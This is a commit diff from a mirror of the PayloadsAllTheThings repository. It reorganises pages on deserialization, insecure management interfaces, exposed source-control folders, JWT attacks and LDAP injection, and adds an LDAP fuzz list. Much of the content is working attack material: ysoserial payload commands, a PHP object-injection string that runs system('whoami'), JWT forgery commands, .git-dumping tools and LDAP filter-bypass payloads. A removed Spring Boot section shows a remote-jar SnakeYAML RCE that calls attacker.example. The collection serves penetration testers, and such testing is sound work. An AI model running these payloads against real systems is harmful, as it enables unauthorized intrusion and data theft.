mirror of
https://github.com/swisskyrepo/PayloadsAllTheThings.git
synced 2025-01-18 01:15:25 +00:00
LDAP + LaTeX + Management Interface
This commit is contained in:
parent
801aecb2ba
commit
6795bee1c4
@ -20,8 +20,11 @@
|
||||
|
||||
## Detection
|
||||
|
||||
* `AAEAAD` (Hex) = .NET deserialization BinaryFormatter
|
||||
* `FF01` (Hex) / `/w` (Base64) = .NET ViewState
|
||||
| Data | Description |
|
||||
| -------------- | ------------------- |
|
||||
| `AAEAAD` (Hex) | .NET BinaryFormatter |
|
||||
| `FF01` (Hex) | .NET ViewState |
|
||||
| `/w` (Base64) | .NET ViewState |
|
||||
|
||||
Example: `AAEAAAD/////AQAAAAAAAAAMAgAAAF9TeXN0ZW0u[...]0KPC9PYmpzPgs=`
|
||||
|
||||
@ -134,6 +137,7 @@ $ ./ysoserial.exe -f BinaryFormatter -g PSObject -o base64 -c "calc" -t
|
||||
## POP Gadgets
|
||||
|
||||
These gadgets must have the following properties:
|
||||
|
||||
* Serializable
|
||||
* Public/settable variables
|
||||
* Magic "functions": Get/Set, OnSerialisation, Constructors/Destructors
|
||||
|
@ -21,7 +21,7 @@
|
||||
* `AC ED`: STREAM_MAGIC. Specifies that this is a serialization protocol.
|
||||
* `00 05`: STREAM_VERSION. The serialization version.
|
||||
- `"rO0"` in Base64
|
||||
- Content-type = "application/x-java-serialized-object"
|
||||
- `Content-Type` = "application/x-java-serialized-object"
|
||||
- `"H4sIAAAAAAAAAJ"` in gzip(base64)
|
||||
|
||||
|
||||
@ -41,7 +41,7 @@ java -jar ysoserial.jar Jdk7u21 bash -c 'nslookup `uname`.[redacted]' | gzip | b
|
||||
**List of payloads included in ysoserial:**
|
||||
|
||||
| Payload | Authors | Dependencies |
|
||||
| ------------------- | -------------------------------------- | --- |
|
||||
| ------------------- | -------------------------------------- | --- |
|
||||
| AspectJWeaver | @Jang | aspectjweaver:1.9.2, commons-collections:3.2.2 |
|
||||
| BeanShell1 | @pwntester, @cschneider4711 | bsh:2.0b5 |
|
||||
| C3P0 | @mbechler | c3p0:0.9.5.2, mchange-commons-java:0.2.11 |
|
||||
@ -136,7 +136,7 @@ Payload generators for the following marshallers are included:
|
||||
|
||||
## YAML Deserialization
|
||||
|
||||
SnakeYAML
|
||||
SnakeYAML is a popular Java-based library used for parsing and emitting YAML (YAML Ain't Markup Language) data. It provides an easy-to-use API for working with YAML, a human-readable data serialization standard commonly used for configuration files and data exchange.
|
||||
|
||||
```yaml
|
||||
!!javax.script.ScriptEngineManager [
|
||||
|
@ -14,6 +14,7 @@
|
||||
## Methodology
|
||||
|
||||
* In Node source code, look for:
|
||||
|
||||
* `node-serialize`
|
||||
* `serialize-to-js`
|
||||
* `funcster`
|
||||
|
@ -25,7 +25,6 @@ The following magic methods will help you for a PHP Object injection
|
||||
Also you should check the `Wrapper Phar://` in [File Inclusion](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/File%20Inclusion#wrapper-phar) which use a PHP object injection.
|
||||
|
||||
|
||||
|
||||
Vulnerable code:
|
||||
|
||||
```php
|
||||
@ -54,13 +53,15 @@ Vulnerable code:
|
||||
|
||||
Craft a payload using existing code inside the application.
|
||||
|
||||
```php
|
||||
# Basic serialized data
|
||||
a:2:{i:0;s:4:"XVWA";i:1;s:33:"Xtreme Vulnerable Web Application";}
|
||||
* Basic serialized data
|
||||
```php
|
||||
a:2:{i:0;s:4:"XVWA";i:1;s:33:"Xtreme Vulnerable Web Application";}
|
||||
```
|
||||
|
||||
# Command execution
|
||||
string(68) "O:18:"PHPObjectInjection":1:{s:6:"inject";s:17:"system('whoami');";}"
|
||||
```
|
||||
* Command execution
|
||||
```php
|
||||
string(68) "O:18:"PHPObjectInjection":1:{s:6:"inject";s:17:"system('whoami');";}"
|
||||
```
|
||||
|
||||
|
||||
## Authentication Bypass
|
||||
@ -88,6 +89,7 @@ a:2:{s:8:"username";b:1;s:8:"password";b:1;}
|
||||
|
||||
Because `true == "str"` is true.
|
||||
|
||||
|
||||
## Object Injection
|
||||
|
||||
Vulnerable code:
|
||||
@ -130,7 +132,6 @@ Also called `"PHP POP Chains"`, they can be used to gain RCE on the system.
|
||||
|
||||
* In PHP source code, look for `unserialize()` function.
|
||||
* Interesting [Magic Methods](https://www.php.net/manual/en/language.oop5.magic.php) such as `__construct()`, `__destruct()`, `__call()`, `__callStatic()`, `__get()`, `__set()`, `__isset()`, `__unset()`, `__sleep()`, `__wakeup()`, `__serialize()`, `__unserialize()`, `__toString()`, `__invoke()`, `__set_state()`, `__clone()`, and `__debugInfo()`:
|
||||
|
||||
* `__construct()`: PHP allows developers to declare constructor methods for classes. Classes which have a constructor method call this method on each newly-created object, so it is suitable for any initialization that the object may need before it is used. [php.net](https://www.php.net/manual/en/language.oop5.decon.php#object.construct)
|
||||
* `__destruct()`: The destructor method will be called as soon as there are no other references to a particular object, or in any order during the shutdown sequence. [php.net](https://www.php.net/manual/en/language.oop5.decon.php#object.destruct)
|
||||
* `__call(string $name, array $arguments)`: The `$name` argument is the name of the method being called. The `$arguments` argument is an enumerated array containing the parameters passed to the `$name`'ed method. [php.net](https://www.php.net/manual/en/language.oop5.overloading.php#object.call)
|
||||
|
@ -4,18 +4,19 @@
|
||||
|
||||
## Summary
|
||||
|
||||
* [Detection](#detection)
|
||||
* [Pickle](#pickle)
|
||||
* [PyYAML](#pyyaml)
|
||||
* [Tools](#tools)
|
||||
* [Methodology](#methodology)
|
||||
* [Pickle](#pickle)
|
||||
* [PyYAML](#pyyaml)
|
||||
* [References](#references)
|
||||
|
||||
|
||||
## Tools
|
||||
|
||||
* [j0lt-github/python-deserialization-attack-payload-generator](https://github.com/j0lt-github/python-deserialization-attack-payload-generator)
|
||||
* [j0lt-github/python-deserialization-attack-payload-generator](https://github.com/j0lt-github/python-deserialization-attack-payload-generator) - Serialized payload for deserialization RCE attack on python driven applications where pickle,PyYAML, ruamel.yaml or jsonpickle module is used for deserialization of serialized data.
|
||||
|
||||
|
||||
## Detection
|
||||
## Methodology
|
||||
|
||||
In Python source code, look for these sinks:
|
||||
|
||||
@ -25,7 +26,7 @@ In Python source code, look for these sinks:
|
||||
* `jsonpickle.decode`
|
||||
|
||||
|
||||
## Pickle
|
||||
### Pickle
|
||||
|
||||
The following code is a simple example of using `cPickle` in order to generate an auth_token which is a serialized User object.
|
||||
:warning: `import cPickle` will only work on Python 2
|
||||
@ -71,7 +72,7 @@ print("Your Evil Token : {}").format(evil_token)
|
||||
```
|
||||
|
||||
|
||||
## PyYAML
|
||||
### PyYAML
|
||||
|
||||
YAML deserialization is the process of converting YAML-formatted data back into objects in programming languages like Python, Ruby, or Java. YAML (YAML Ain't Markup Language) is popular for configuration files and data serialization because it is human-readable and supports complex data structures.
|
||||
|
||||
@ -98,7 +99,7 @@ state: !!python/tuple
|
||||
update: !!python/name:exec
|
||||
```
|
||||
|
||||
Since PyYaml version 6.0, the default loader for `load` has been switched to SafeLoader mitigating the risks against Remote Code Execution. [PR fixing the vulnerabily](https://github.com/yaml/pyyaml/issues/420)
|
||||
Since PyYaml version 6.0, the default loader for `load` has been switched to SafeLoader mitigating the risks against Remote Code Execution. [PR #420 - Fix](https://github.com/yaml/pyyaml/issues/420)
|
||||
|
||||
The vulnerable sinks are now `yaml.unsafe_load` and `yaml.load(input, Loader=yaml.UnsafeLoader)`.
|
||||
|
||||
|
@ -114,7 +114,7 @@ Send a wildcard (`*`, `%`, `.`, `_`) instead of an ID, some backend might respon
|
||||
|
||||
**Examples**
|
||||
|
||||
* [TODO]()
|
||||
* [TODO](#)
|
||||
|
||||
|
||||
### IDOR Tips
|
||||
|
@ -7,103 +7,40 @@
|
||||
|
||||
## Summary
|
||||
|
||||
* [Springboot-Actuator](#springboot-actuator)
|
||||
* [Remote Code Execution via /env](#remote-code-execution-via-env)
|
||||
* [Methodology](#methodology)
|
||||
* [References](#references)
|
||||
|
||||
|
||||
## Springboot-Actuator
|
||||
## Methodology
|
||||
|
||||
Actuator endpoints let you monitor and interact with your application.
|
||||
Spring Boot includes a number of built-in endpoints and lets you add your own.
|
||||
For example, the `/health` endpoint provides basic application health information.
|
||||
Insecure Management Interface vulnerabilities arise when administrative interfaces of systems or applications are improperly secured, allowing unauthorized or malicious users to gain access, modify configurations, or exploit sensitive operations. These interfaces are often critical for maintaining, monitoring, and controlling systems and must be secured rigorously.
|
||||
|
||||
Some of them contains sensitive info such as :
|
||||
* Lack of Authentication or Weak Authentication:
|
||||
* Interfaces accessible without requiring credentials.
|
||||
* Use of default or weak credentials (e.g., admin/admin).
|
||||
|
||||
- `/trace` - Displays trace information (by default the last 100 HTTP requests with headers).
|
||||
- `/env` - Displays the current environment properties (from Spring’s ConfigurableEnvironment).
|
||||
- `/heapdump` - Builds and returns a heap dump from the JVM used by our application.
|
||||
- `/dump` - Displays a dump of threads (including a stack trace).
|
||||
- `/logfile` - Outputs the contents of the log file.
|
||||
- `/mappings` - Shows all of the MVC controller mappings.
|
||||
```ps1
|
||||
nuclei -t http/default-logins -u https://example.com
|
||||
```
|
||||
|
||||
These endpoints are enabled by default in Springboot 1.X.
|
||||
Note: Sensitive endpoints will require a username/password when they are accessed over HTTP.
|
||||
* Exposure to the Public Internet
|
||||
```ps1
|
||||
nuclei -t http/exposed-panels -u https://example.com
|
||||
nuclei -t http/exposures -u https://example.com
|
||||
```
|
||||
|
||||
Since Springboot 2.X only `/health` and `/info` are enabled by default.
|
||||
* Sensitive data transmitted over plain HTTP or other unencrypted protocols
|
||||
|
||||
|
||||
### Remote Code Execution via `/env`
|
||||
**Examples**:
|
||||
|
||||
Spring is able to load external configurations in the YAML format.
|
||||
The YAML config is parsed with the SnakeYAML library, which is susceptible to deserialization attacks.
|
||||
In other words, an attacker can gain remote code execution by loading a malicious config file.
|
||||
|
||||
|
||||
#### Steps
|
||||
|
||||
1. Generate a payload of SnakeYAML deserialization gadget.
|
||||
|
||||
- Build malicious jar
|
||||
```bash
|
||||
git clone https://github.com/artsploit/yaml-payload.git
|
||||
cd yaml-payload
|
||||
# Edit the payload before executing the last commands (see below)
|
||||
javac src/artsploit/AwesomeScriptEngineFactory.java
|
||||
jar -cvf yaml-payload.jar -C src/ .
|
||||
```
|
||||
|
||||
- Edit src/artsploit/AwesomeScriptEngineFactory.java
|
||||
|
||||
```java
|
||||
public AwesomeScriptEngineFactory() {
|
||||
try {
|
||||
Runtime.getRuntime().exec("ping rce.poc.attacker.example"); // COMMAND HERE
|
||||
} catch (IOException e) {
|
||||
e.printStackTrace();
|
||||
}
|
||||
}
|
||||
```
|
||||
|
||||
- Create a malicious yaml config (yaml-payload.yml)
|
||||
|
||||
```yaml
|
||||
!!javax.script.ScriptEngineManager [
|
||||
!!java.net.URLClassLoader [[
|
||||
!!java.net.URL ["http://attacker.example/yaml-payload.jar"]
|
||||
]]
|
||||
]
|
||||
```
|
||||
|
||||
|
||||
2. Host the malicious files on your server.
|
||||
|
||||
- yaml-payload.jar
|
||||
- yaml-payload.yml
|
||||
|
||||
|
||||
3. Change `spring.cloud.bootstrap.location` to your server.
|
||||
|
||||
```
|
||||
POST /env HTTP/1.1
|
||||
Host: victim.example:8090
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
Content-Length: 59
|
||||
|
||||
spring.cloud.bootstrap.location=http://attacker.example/yaml-payload.yml
|
||||
```
|
||||
|
||||
4. Reload the configuration.
|
||||
|
||||
```
|
||||
POST /refresh HTTP/1.1
|
||||
Host: victim.example:8090
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
Content-Length: 0
|
||||
```
|
||||
* **Network Devices**: Routers, switches, or firewalls with default credentials or unpatched vulnerabilities.
|
||||
* **Web Applications**: Admin panels without authentication or exposed via predictable URLs (e.g., /admin).
|
||||
* **Cloud Services**: API endpoints without proper authentication or overly permissive roles.
|
||||
|
||||
|
||||
## References
|
||||
|
||||
- [CAPEC-121: Exploit Non-Production Interfaces - CAPEC - July 30, 2020](https://capec.mitre.org/data/definitions/121.html)
|
||||
- [Exploiting Spring Boot Actuators - Michael Stepankin - Feb 25, 2019](https://www.veracode.com/blog/research/exploiting-spring-boot-actuators)
|
||||
- [Springboot - Official Documentation - May 9, 2024](https://docs.spring.io/spring-boot/docs/current/reference/html/production-ready-endpoints.html)
|
@ -15,15 +15,16 @@
|
||||
|
||||
### rip-bzr.pl
|
||||
|
||||
```powershell
|
||||
wget https://raw.githubusercontent.com/kost/dvcs-ripper/master/rip-bzr.pl
|
||||
docker run --rm -it -v /path/to/host/work:/work:rw k0st/alpine-dvcs-ripper rip-bzr.pl -v -u
|
||||
```
|
||||
* [kost/dvcs-ripper/rip-bzr.pl](https://raw.githubusercontent.com/kost/dvcs-ripper/master/rip-bzr.pl)
|
||||
```powershell
|
||||
docker run --rm -it -v /path/to/host/work:/work:rw k0st/alpine-dvcs-ripper rip-bzr.pl -v -u
|
||||
```
|
||||
|
||||
### bzr_dumper
|
||||
|
||||
* [SeahunOh/bzr_dumper](https://github.com/SeahunOh/bzr_dumper)
|
||||
|
||||
```powershell
|
||||
git clone https://github.com/SeahunOh/bzr_dumper
|
||||
python3 dumper.py -u "http://127.0.0.1:5000/" -o source
|
||||
Created a standalone tree (format: 2a)
|
||||
[!] Target : http://127.0.0.1:5000/
|
||||
@ -38,8 +39,10 @@ Created a standalone tree (format: 2a)
|
||||
[+] GET branch/tag
|
||||
[+] GET b'154411f0f33adc3ff8cfb3d34209cbd1'
|
||||
[*] Finish
|
||||
```
|
||||
|
||||
$ bzr revert
|
||||
```powershell
|
||||
bzr revert
|
||||
N application.py
|
||||
N database.py
|
||||
N static/
|
||||
|
@ -27,9 +27,9 @@ The following examples will create either a copy of the .git or a copy of the cu
|
||||
|
||||
Check for the following files, if they exist you can extract the .git folder.
|
||||
|
||||
- .git/config
|
||||
- .git/HEAD
|
||||
- .git/logs/HEAD
|
||||
- `.git/config`
|
||||
- `.git/HEAD`
|
||||
- `.git/logs/HEAD`
|
||||
|
||||
|
||||
### Recovering file contents from .git/logs/HEAD
|
||||
@ -112,26 +112,29 @@ sha1 = d7ef4d77741c38b6d3806e0c6a57bf1090eec141
|
||||
|
||||
#### git-dumper.py
|
||||
|
||||
* [arthaud/git-dumper](https://github.com/arthaud/git-dumper)
|
||||
```powershell
|
||||
git clone https://github.com/arthaud/git-dumper
|
||||
pip install -r requirements.txt
|
||||
./git-dumper.py http://web.site/.git ~/website
|
||||
```
|
||||
|
||||
#### diggit.py
|
||||
|
||||
* [bl4de/security-tools/diggit](https://github.com/bl4de/security-tools/)
|
||||
|
||||
```powershell
|
||||
git clone https://github.com/bl4de/security-tools/ && cd security-tools/diggit
|
||||
./diggit.py -u remote_git_repo -t temp_folder -o object_hash [-r=True]
|
||||
./diggit.py -u http://web.site -t /path/to/temp/folder/ -o d60fbeed6db32865a1f01bb9e485755f085f51c1
|
||||
|
||||
-u is remote path, where .git folder exists
|
||||
-t is path to local folder with dummy Git repository and where blob content (files) are saved with their real names (cd /path/to/temp/folder && git init)
|
||||
-o is a hash of particular Git object to download
|
||||
```
|
||||
|
||||
`-u` is remote path, where .git folder exists
|
||||
`-t` is path to local folder with dummy Git repository and where blob content (files) are saved with their real names (`cd /path/to/temp/folder && git init`)
|
||||
`-o` is a hash of particular Git object to download
|
||||
|
||||
#### GoGitDumper
|
||||
|
||||
* [c-sto/gogitdumper](https://github.com/c-sto/gogitdumper)
|
||||
|
||||
```powershell
|
||||
go get github.com/c-sto/gogitdumper
|
||||
gogitdumper -u http://web.site/.git/ -o yourdecideddir/.git/
|
||||
@ -141,8 +144,9 @@ git checkout
|
||||
|
||||
#### rip-git
|
||||
|
||||
* [kost/dvcs-ripper](https://github.com/kost/dvcs-ripper)
|
||||
|
||||
```powershell
|
||||
git clone https://github.com/kost/dvcs-ripper
|
||||
perl rip-git.pl -v -u "http://web.site/.git/"
|
||||
|
||||
git cat-file -p 07603070376d63d911f608120eb4b5489b507692
|
||||
@ -156,15 +160,17 @@ git cat-file -p 5dae937a49acc7c2668f5bcde2a9fd07fc382fe2
|
||||
|
||||
#### GitHack
|
||||
|
||||
* [lijiejie/GitHack](https://github.com/lijiejie/GitHack)
|
||||
|
||||
```powershell
|
||||
git clone https://github.com/lijiejie/GitHack
|
||||
GitHack.py http://web.site/.git/
|
||||
```
|
||||
|
||||
#### GitTools
|
||||
|
||||
* [internetwache/GitTools](https://github.com/internetwache/GitTools)
|
||||
|
||||
```powershell
|
||||
git clone https://github.com/internetwache/GitTools
|
||||
./gitdumper.sh http://target.tld/.git/ /tmp/destdir
|
||||
git checkout -- .
|
||||
```
|
||||
@ -204,20 +210,20 @@ gitrob [options] target [target2] ... [targetN]
|
||||
|
||||
> Gitleaks provides a way for you to find unencrypted secrets and other unwanted data types in git source code repositories.
|
||||
|
||||
```powershell
|
||||
# Run gitleaks against a public repository
|
||||
docker run --rm --name=gitleaks zricethezav/gitleaks -v -r https://github.com/zricethezav/gitleaks.git
|
||||
* Run gitleaks against a public repository
|
||||
```powershell
|
||||
docker run --rm --name=gitleaks zricethezav/gitleaks -v -r https://github.com/zricethezav/gitleaks.git
|
||||
```
|
||||
|
||||
# Run gitleaks against a local repository already cloned into /tmp/
|
||||
docker run --rm --name=gitleaks -v /tmp/:/code/ zricethezav/gitleaks -v --repo-path=/code/gitleaks
|
||||
* Run gitleaks against a local repository already cloned into /tmp/
|
||||
```powershell
|
||||
docker run --rm --name=gitleaks -v /tmp/:/code/ zricethezav/gitleaks -v --repo-path=/code/gitleaks
|
||||
```
|
||||
|
||||
# Run gitleaks against a specific Github Pull request
|
||||
docker run --rm --name=gitleaks -e GITHUB_TOKEN={your token} zricethezav/gitleaks --github-pr=https://github.com/owner/repo/pull/9000
|
||||
|
||||
or
|
||||
|
||||
go get -u github.com/zricethezav/gitleaks
|
||||
```
|
||||
* Run gitleaks against a specific Github Pull request
|
||||
```powershell
|
||||
docker run --rm --name=gitleaks -e GITHUB_TOKEN={your token} zricethezav/gitleaks --github-pr=https://github.com/owner/repo/pull/9000
|
||||
```
|
||||
|
||||
|
||||
## References
|
||||
|
@ -6,10 +6,10 @@
|
||||
## Summary
|
||||
|
||||
* [Methodology](#methodology)
|
||||
* [Bazaar](./Bazaar.md)
|
||||
* [Git](./Git.md)
|
||||
* [Mercurial](./Mercurial.md)
|
||||
* [Subversion](./Subversion.md)
|
||||
* [Bazaar](./Bazaar.md)
|
||||
* [Git](./Git.md)
|
||||
* [Mercurial](./Mercurial.md)
|
||||
* [Subversion](./Subversion.md)
|
||||
* [Labs](#labs)
|
||||
* [References](#references)
|
||||
|
||||
@ -43,6 +43,7 @@ location /.git {
|
||||
|
||||
For example in Git, the exploitation technique doesn't require to list the content of the `.git` folder (http://target.com/.git/), the data extraction can still be conducted when files can be read.
|
||||
|
||||
|
||||
## Labs
|
||||
|
||||
* [Root Me - Insecure Code Management](https://www.root-me.org/fr/Challenges/Web-Serveur/Insecure-Code-Management)
|
||||
|
@ -5,14 +5,11 @@
|
||||
## Summary
|
||||
|
||||
* [Tools](#tools)
|
||||
* [svn-extractor](#svn-extractor)
|
||||
* [Methodology](#methodology)
|
||||
* [References](#references)
|
||||
|
||||
## Tools
|
||||
|
||||
### svn-extractor
|
||||
|
||||
* [anantshri/svn-extractor](https://github.com/anantshri/svn-extractor) - Simple script to extract all web resources by means of .SVN folder exposed over network.
|
||||
```powershell
|
||||
python svn-extractor.py --url "url with .svn available"
|
||||
@ -28,9 +25,10 @@ curl http://blog.domain.com/.svn/text-base/wp-config.php.svn-base
|
||||
```powershell
|
||||
INSERT INTO "NODES" VALUES(1,'trunk/test.txt',0,'trunk',1,'trunk/test.txt',2,'normal',NULL,NULL,'file',X'2829',NULL,'$sha1$945a60e68acc693fcb74abadb588aac1a9135f62',NULL,2,1456056344886288,'bl4de',38,1456056261000000,NULL,NULL);
|
||||
```
|
||||
|
||||
2. Download interesting files
|
||||
* remove \$sha1\$ prefix
|
||||
* add .svn-base postfix
|
||||
* remove `$sha1$` prefix
|
||||
* add `.svn-base` postfix
|
||||
* use first byte from hash as a subdirectory of the `pristine/` directory (`94` in this case)
|
||||
* create complete path, which will be: `http://server/path_to_vulnerable_site/.svn/pristine/94/945a60e68acc693fcb74abadb588aac1a9135f62.svn-base`
|
||||
|
||||
|
@ -7,8 +7,8 @@
|
||||
|
||||
- [Tools](#tools)
|
||||
- [JWT Format](#jwt-format)
|
||||
- [Header](#header)
|
||||
- [Payload](#payload)
|
||||
- [Header](#header)
|
||||
- [Payload](#payload)
|
||||
- [JWT Signature](#jwt-signature)
|
||||
- [JWT Signature - Null Signature Attack (CVE-2020-28042)](#jwt-signature---null-signature-attack-cve-2020-28042)
|
||||
- [JWT Signature - Disclosure of a correct signature (CVE-2019-7644)](#jwt-signature---disclosure-of-a-correct-signature-cve-2019-7644)
|
||||
@ -17,10 +17,8 @@
|
||||
- [JWT Signature - Key Injection Attack (CVE-2018-0114)](#jwt-signature---key-injection-attack-cve-2018-0114)
|
||||
- [JWT Signature - Recover Public Key From Signed JWTs](#jwt-signature---recover-public-key-from-signed-jwts)
|
||||
- [JWT Secret](#jwt-secret)
|
||||
- [Encode and Decode JWT with the secret](#encode-and-decode-jwt-with-the-secret)
|
||||
- [Break JWT secret](#break-jwt-secret)
|
||||
- [JWT tool](#jwt-tool)
|
||||
- [Hashcat](#hashcat)
|
||||
- [Encode and Decode JWT with the secret](#encode-and-decode-jwt-with-the-secret)
|
||||
- [Break JWT secret](#break-jwt-secret)
|
||||
- [JWT Claims](#jwt-claims)
|
||||
- [JWT kid Claim Misuse](#jwt-kid-claim-misuse)
|
||||
- [JWKS - jku header injection](#jwks---jku-header-injection)
|
||||
@ -150,7 +148,7 @@ Send a JWT with an incorrect signature, the endpoint might respond with an error
|
||||
* [jwt-dotnet/jwt: Critical Security Fix Required: You disclose the correct signature with each SignatureVerificationException... #61](https://github.com/jwt-dotnet/jwt/issues/61)
|
||||
* [CVE-2019-7644: Security Vulnerability in Auth0-WCF-Service-JWT](https://auth0.com/docs/secure/security-guidance/security-bulletins/cve-2019-7644)
|
||||
|
||||
```
|
||||
```ps1
|
||||
Invalid signature. Expected SflKxwRJSMeKKF2QT4fwpMeJf36POk6yJV_adQssw5c got 9twuPVu9Wj3PBneGw1ctrf3knr7RX12v-UwocfLhXIs
|
||||
Invalid signature. Expected 8Qh5lJ5gSaQylkSdaCIDBoOqKzhoJ0Nutkkap8RgB1Y= got 8Qh5lJ5gSaQylkSdaCIDBoOqKzhoJ0Nutkkap8RgBOo=
|
||||
```
|
||||
@ -161,16 +159,16 @@ Invalid signature. Expected 8Qh5lJ5gSaQylkSdaCIDBoOqKzhoJ0Nutkkap8RgB1Y= got 8Qh
|
||||
JWT supports a `None` algorithm for signature. This was probably introduced to debug applications. However, this can have a severe impact on the security of the application.
|
||||
|
||||
None algorithm variants:
|
||||
* none
|
||||
* None
|
||||
* NONE
|
||||
* nOnE
|
||||
* `none`
|
||||
* `None`
|
||||
* `NONE`
|
||||
* `nOnE`
|
||||
|
||||
To exploit this vulnerability, you just need to decode the JWT and change the algorithm used for the signature. Then you can submit your new JWT. However, this won't work unless you **remove** the signature
|
||||
|
||||
Alternatively you can modify an existing JWT (be careful with the expiration time)
|
||||
|
||||
* Using [ticarpi/jwt_tool](#)
|
||||
* Using [ticarpi/jwt_tool](https://github.com/ticarpi/jwt_tool)
|
||||
```ps1
|
||||
python3 jwt_tool.py [JWT_HERE] -X a
|
||||
```
|
||||
@ -207,7 +205,7 @@ print jwt.encode({"data":"test"}, key=public, algorithm='HS256')
|
||||
|
||||
:warning: This behavior is fixed in the python library and will return this error `jwt.exceptions.InvalidKeyError: The specified key is an asymmetric key or x509 certificate and should not be used as an HMAC secret.`. You need to install the following version: `pip install pyjwt==0.4.3`.
|
||||
|
||||
* Using [ticarpi/jwt_tool](#)
|
||||
* Using [ticarpi/jwt_tool](https://github.com/ticarpi/jwt_tool)
|
||||
```ps1
|
||||
python3 jwt_tool.py JWT_HERE -X k -pk my_public.pem
|
||||
```
|
||||
@ -258,16 +256,20 @@ print jwt.encode({"data":"test"}, key=public, algorithm='HS256')
|
||||
|
||||
|
||||
**Exploit**:
|
||||
* Using [ticarpi/jwt_tool]
|
||||
|
||||
* Using [ticarpi/jwt_tool](https://github.com/ticarpi/jwt_tool)
|
||||
|
||||
```ps1
|
||||
python3 jwt_tool.py [JWT_HERE] -X i
|
||||
```
|
||||
* Using [portswigger/JWT Editor](#)
|
||||
|
||||
* Using [portswigger/JWT Editor](https://portswigger.net/bappstore/26aaa5ded2f74beea19e2ed8345a93dd)
|
||||
1. Add a `New RSA key`
|
||||
2. In the JWT's Repeater tab, edit data
|
||||
3. `Attack` > `Embedded JWK`
|
||||
|
||||
**Deconstructed**:
|
||||
|
||||
```json
|
||||
{
|
||||
"alg": "RS256",
|
||||
@ -290,6 +292,7 @@ print jwt.encode({"data":"test"}, key=public, algorithm='HS256')
|
||||
The RS256, RS384 and RS512 algorithms use RSA with PKCS#1 v1.5 padding as their signature scheme. This has the property that you can compute the public key given two different messages and accompanying signatures.
|
||||
|
||||
[SecuraBV/jws2pubkey](https://github.com/SecuraBV/jws2pubkey): compute an RSA public key from two signed JWTs
|
||||
|
||||
```ps1
|
||||
$ docker run -it ttervoort/jws2pubkey JWS1 JWS2
|
||||
$ docker run -it ttervoort/jws2pubkey "$(cat sample-jws/sample1.txt)" "$(cat sample-jws/sample2.txt)" | tee pubkey.jwk
|
||||
@ -483,12 +486,12 @@ You should create your own key pair for this attack and host it. It should look
|
||||
|
||||
**Exploit**:
|
||||
|
||||
* Using [ticarpi/jwt_tool]
|
||||
* Using [ticarpi/jwt_tool](https://github.com/ticarpi/jwt_tool)
|
||||
```ps1
|
||||
python3 jwt_tool.py JWT_HERE -X s
|
||||
python3 jwt_tool.py JWT_HERE -X s -ju http://example.com/jwks.json
|
||||
```
|
||||
* Using [portswigger/JWT Editor](#)
|
||||
* Using [portswigger/JWT Editor](https://portswigger.net/bappstore/26aaa5ded2f74beea19e2ed8345a93dd)
|
||||
1. Generate a new RSA key and host it
|
||||
2. Edit JWT's data
|
||||
3. Replace the `kid` header with the one from your JWKS
|
||||
|
20
LDAP Injection/Intruder/LDAP_FUZZ_SMALL.txt
Normal file
20
LDAP Injection/Intruder/LDAP_FUZZ_SMALL.txt
Normal file
@ -0,0 +1,20 @@
|
||||
*
|
||||
*)(&
|
||||
*))%00
|
||||
)(cn=))\x00
|
||||
*()|%26'
|
||||
*()|&'
|
||||
*(|(mail=*))
|
||||
*(|(objectclass=*))
|
||||
*)(uid=*))(|(uid=*
|
||||
*/*
|
||||
*|
|
||||
/
|
||||
//
|
||||
//*
|
||||
@*
|
||||
|
|
||||
admin*
|
||||
admin*)((|userpassword=*)
|
||||
admin*)((|userPassword=*)
|
||||
x' or name()='username' or 'x'='ys
|
@ -6,20 +6,26 @@
|
||||
## Summary
|
||||
|
||||
* [Methodology](#methodology)
|
||||
* [Payloads](#payloads)
|
||||
* [Blind Exploitation](#blind-exploitation)
|
||||
* [Defaults attributes](#defaults-attributes)
|
||||
* [Exploiting userPassword attribute](#exploiting-userpassword-attribute)
|
||||
* [Authentication Bypass](#authentication-bypass)
|
||||
* [Blind Exploitation](#blind-exploitation)
|
||||
* [Defaults Attributes](#defaults-attributes)
|
||||
* [Exploiting userPassword Attribute](#exploiting-userpassword-attribute)
|
||||
* [Scripts](#scripts)
|
||||
* [Discover valid LDAP fields](#discover-valid-ldap-fields)
|
||||
* [Special blind LDAP injection](#special-blind-ldap-injection)
|
||||
* [Discover Valid LDAP Fields](#discover-valid-ldap-fields)
|
||||
* [Special Blind LDAP Injection](#special-blind-ldap-injection)
|
||||
* [Labs](#labs)
|
||||
* [References](#references)
|
||||
|
||||
|
||||
## Methodology
|
||||
|
||||
Example 1.
|
||||
LDAP Injection is a vulnerability that occurs when user-supplied input is used to construct LDAP queries without proper sanitization or escaping
|
||||
|
||||
### Authentication Bypass
|
||||
|
||||
Attempt to manipulate the filter logic by injecting always-true conditions.
|
||||
|
||||
**Example 1**: This LDAP query exploits logical operators in the query structure to potentially bypass authentication
|
||||
|
||||
```sql
|
||||
user = *)(uid=*))(|(uid=*
|
||||
@ -27,7 +33,7 @@ pass = password
|
||||
query = (&(uid=*)(uid=*))(|(uid=*)(userPassword={MD5}X03MO1qnZdYdgyfeuILPmQ==))
|
||||
```
|
||||
|
||||
Example 2
|
||||
**Example 2**: This LDAP query exploits logical operators in the query structure to potentially bypass authentication
|
||||
|
||||
```sql
|
||||
user = admin)(!(&(1=0
|
||||
@ -35,34 +41,10 @@ pass = q))
|
||||
query = (&(uid=admin)(!(&(1=0)(userPassword=q))))
|
||||
```
|
||||
|
||||
## Payloads
|
||||
|
||||
```text
|
||||
*
|
||||
*)(&
|
||||
*))%00
|
||||
)(cn=))\x00
|
||||
*()|%26'
|
||||
*()|&'
|
||||
*(|(mail=*))
|
||||
*(|(objectclass=*))
|
||||
*)(uid=*))(|(uid=*
|
||||
*/*
|
||||
*|
|
||||
/
|
||||
//
|
||||
//*
|
||||
@*
|
||||
|
|
||||
admin*
|
||||
admin*)((|userpassword=*)
|
||||
admin*)((|userPassword=*)
|
||||
x' or name()='username' or 'x'='y
|
||||
```
|
||||
### Blind Exploitation
|
||||
|
||||
## Blind Exploitation
|
||||
|
||||
We can extract using a bypass login
|
||||
This scenario demonstrates LDAP blind exploitation using a technique similar to binary search or character-based brute-forcing to discover sensitive information like passwords. It relies on the fact that LDAP filters respond differently to queries based on whether the conditions match or not, without directly revealing the actual password.
|
||||
|
||||
```sql
|
||||
(&(sn=administrator)(password=*)) : OK
|
||||
@ -82,8 +64,14 @@ We can extract using a bypass login
|
||||
